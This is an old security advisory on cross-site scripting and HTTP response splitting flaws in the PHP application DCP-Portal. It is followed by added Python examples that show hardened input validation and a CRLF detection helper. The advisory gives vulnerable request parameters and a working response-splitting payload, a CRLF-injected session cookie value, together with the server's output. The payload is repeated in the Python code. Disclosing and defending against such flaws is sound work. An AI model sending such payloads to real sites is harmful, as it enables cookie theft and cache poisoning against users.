Title: [Maxpatrol Security Advisory] Multiple vulnerabilities in DCP-Portal
Date: 28.09.2004
Severity: Low
Application: DCP-Portal, dcp-portal
Platform: PHP

I. DESCRIPTION
--------------

Multiple vulnerabilities were found in DCP-Portal. A remote user can conduct cross-site scripting attacks and HTTP response splitting attacks.

1. XSS in GET

/calendar.php?year=[XSS code here]&month=09&day=01
/calendar.php?year=2004&month=[XSS code here]&day=01
/calendar.php?year=2004&month=09&day=[XSS code here]
/index.php?page=annoucements&cid=[XSS code here]
/annoucement.php?aid=8&cid=[XSS code here]
/news.php?nid=34&cid=[XSS code here]
/contents.php?cid=[XSS code here]
/index.php?cid=[XSS code here]

2. XSS in POST

POST /index.php?page=send_write HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS code here]

POST /search.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

PHPSESSID=1&q=[XSS code here]&fields=1

POST /register.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=scanner@ptsecurity.com&address=1&zip=1&city=1&country=[XSS code here]

3. HTTP response splitting

POST /calendar.php?show=full_month HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

PHPSESSID=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a&s=1&submit=1

Result

<...>
(Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34

Scanned by PTsecurity
; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
<...>

The unvalidated PHPSESSID value is written into the Set-Cookie header, so the CR/LF sequences in it terminate the real response early and the remainder of the value is delivered as a second, attacker-controlled response.

II. IMPACT
----------

A remote user can access the target user's cookies (including authentication cookies).
A remote user may be able to poison any intermediate web caches with arbitrary content.

III. SOLUTION
-------------

Not available currently.

IV. VENDOR FIX/RESPONSE
-----------------------

n/a

V. CREDIT
---------

This vulnerability was discovered by Positive Technologies using MaxPatrol (www.maxpatrol.com), an intelligent professional security scanner. It is able to detect a substantial number of vulnerabilities not yet published. MaxPatrol's intelligent algorithms are also capable of detecting many vulnerabilities in custom web scripts (XSS, SQL and code injections, HTTP response splitting).
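Sections 1 and 2 list request parameters that DCP-Portal reflects into its pages without escaping. The following is an added example, written for this page and not code from the advisory or from DCP-Portal; it uses Python rather than PHP so the behaviour can be run stand-alone. It contrasts the vulnerable echo-the-value pattern with a hardened one that treats the id and date parameters named in section 1 as integers (an assumption about how the application uses them) and HTML-escapes the free-text fields from section 2. The helper names and the sample values are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory shows being reflected unescaped. Judging by their
# use in DCP-Portal's URLs (dates, content/news/announcement ids) they are
# integers, so the hardened path rejects anything that is not a short digit
# string. Assumption: the application never needs non-numeric values here.
NUMERIC_PARAMS = {"year", "month", "day", "cid", "nid", "aid"}


def vulnerable_render(param: str, value: str) -> str:
    """Vulnerable pattern: the raw request value is echoed into the page."""
    return f"<p>Results for {param} = {value}</p>"


def validate_param(param: str, value: str) -> str:
    """Hardened pattern: type-check numeric ids, HTML-escape everything else."""
    if param in NUMERIC_PARAMS:
        if not re.fullmatch(r"\d{1,10}", value):
            raise ValueError(f"parameter {param!r} must be numeric")
        return value
    # Free-text fields (q, url, country, ...) are escaped for an HTML body or
    # quoted-attribute context; quote=True also escapes " and '.
    return html.escape(value, quote=True)


def safe_render(param: str, value: str) -> str:
    """Same page fragment as vulnerable_render, built only from validated input."""
    return f"<p>Results for {param} = {validate_param(param, value)}</p>"


def render_request(request_target: str, body: str = "") -> dict:
    """Take a GET request target (and optionally a POST form body) and return,
    per parameter, what a hardened page would reflect or why it was rejected."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    params.update(parse_qs(body, keep_blank_values=True))
    out = {}
    for name, values in params.items():
        try:
            out[name] = safe_render(name, values[0])
        except ValueError as exc:
            out[name] = f"rejected: {exc}"
    return out


if __name__ == "__main__":
    # Constructed inputs: harmless markup standing in for "[XSS code here]".
    print(vulnerable_render("cid", "<b>markup</b>"))  # markup survives unescaped
    print(render_request("/news.php?nid=34&cid=<b>markup</b>"))
    print(render_request("/search.php", "PHPSESSID=1&q=<b>markup</b>&fields=1"))
```

The numeric whitelist is the stronger of the two controls for the section 1 parameters: a value that can only ever be a digit string cannot carry markup at all, so escaping never has to be relied on for it. Escaping remains necessary for fields such as q, url and country that legitimately contain arbitrary text.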
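Section 3 shows the session id from the request being written into the Set-Cookie header unchanged, which is what lets the CR/LF sequences in the PoC split the response. The following is an added example, not code from the advisory or from DCP-Portal, written in Python so it runs stand-alone. It decodes the advisory's own PHPSESSID value, shows that a naively built response then contains two status lines, and contrasts that with a whitelist check on the session id that rejects any value containing header metacharacters. The session-id character class and length are an assumption about the deployment; the detection helper and all function names are constructed for the example.

```python
import re
from urllib.parse import unquote

# The PHPSESSID value from the advisory's proof of concept, still URL-encoded.
ADVISORY_PAYLOAD = (
    "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a"
    "%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a"
)
# What the server sees after URL-decoding the form field.
DECODED_PAYLOAD = unquote(ADVISORY_PAYLOAD)

# Shape of a legitimate session id. Assumption for this example: the
# deployment uses PHP's default alphanumeric session ids of modest length.
SESSION_ID_RE = re.compile(r"[A-Za-z0-9,-]{1,128}")


def build_response_naive(session_id: str) -> bytes:
    """Vulnerable pattern: a decoded request value is written into a header
    without any check for CR/LF, which is what the advisory's PoC exploits."""
    headers = [
        "HTTP/1.1 200 OK",
        f"Set-Cookie: PHPSESSID={session_id}; path=/",
        "Content-Type: text/html",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n<html>real page</html>").encode()


def count_status_lines(raw: bytes) -> int:
    """Count HTTP status lines in the byte stream. One response must contain
    exactly one; a second status line means the response was split."""
    return len(re.findall(rb"(?m)^HTTP/1\.[01] \d{3}", raw))


def safe_session_id(value: str) -> str:
    """Hardened pattern: accept only a well-formed session id. CR, LF and any
    other header metacharacter fail the whitelist, so nothing from the request
    can ever introduce a second header or a second response."""
    if not SESSION_ID_RE.fullmatch(value):
        raise ValueError("malformed session id")
    return value


def build_response_safe(session_id: str) -> bytes:
    """Same response builder, reachable only through the whitelist."""
    return build_response_naive(safe_session_id(session_id))


def request_contains_crlf(form_body: str) -> bool:
    """Detection helper for proxy or WAF logs: does any URL-decoded form value
    contain a carriage return or line feed? Legitimate form fields never do."""
    return any("\r" in unquote(field) or "\n" in unquote(field)
               for field in form_body.split("&"))


if __name__ == "__main__":
    print(count_status_lines(build_response_naive(DECODED_PAYLOAD)))  # 2: split
    print(request_contains_crlf(f"PHPSESSID={ADVISORY_PAYLOAD}&s=1&submit=1"))  # True
    try:
        build_response_safe(DECODED_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
    print(count_status_lines(build_response_safe("4f3a9c2b7e1d")))  # 1
```

The whitelist is preferable to stripping CR/LF: rejecting the request also gives the detection side a clean signal, whereas silent stripping hides the attempt. In the PHP setting of the advisory the equivalent is validating the request-supplied session id before it reaches the session or cookie functions; later PHP releases made header() itself refuse values containing newlines, but a value accepted as a session id still needs this kind of check.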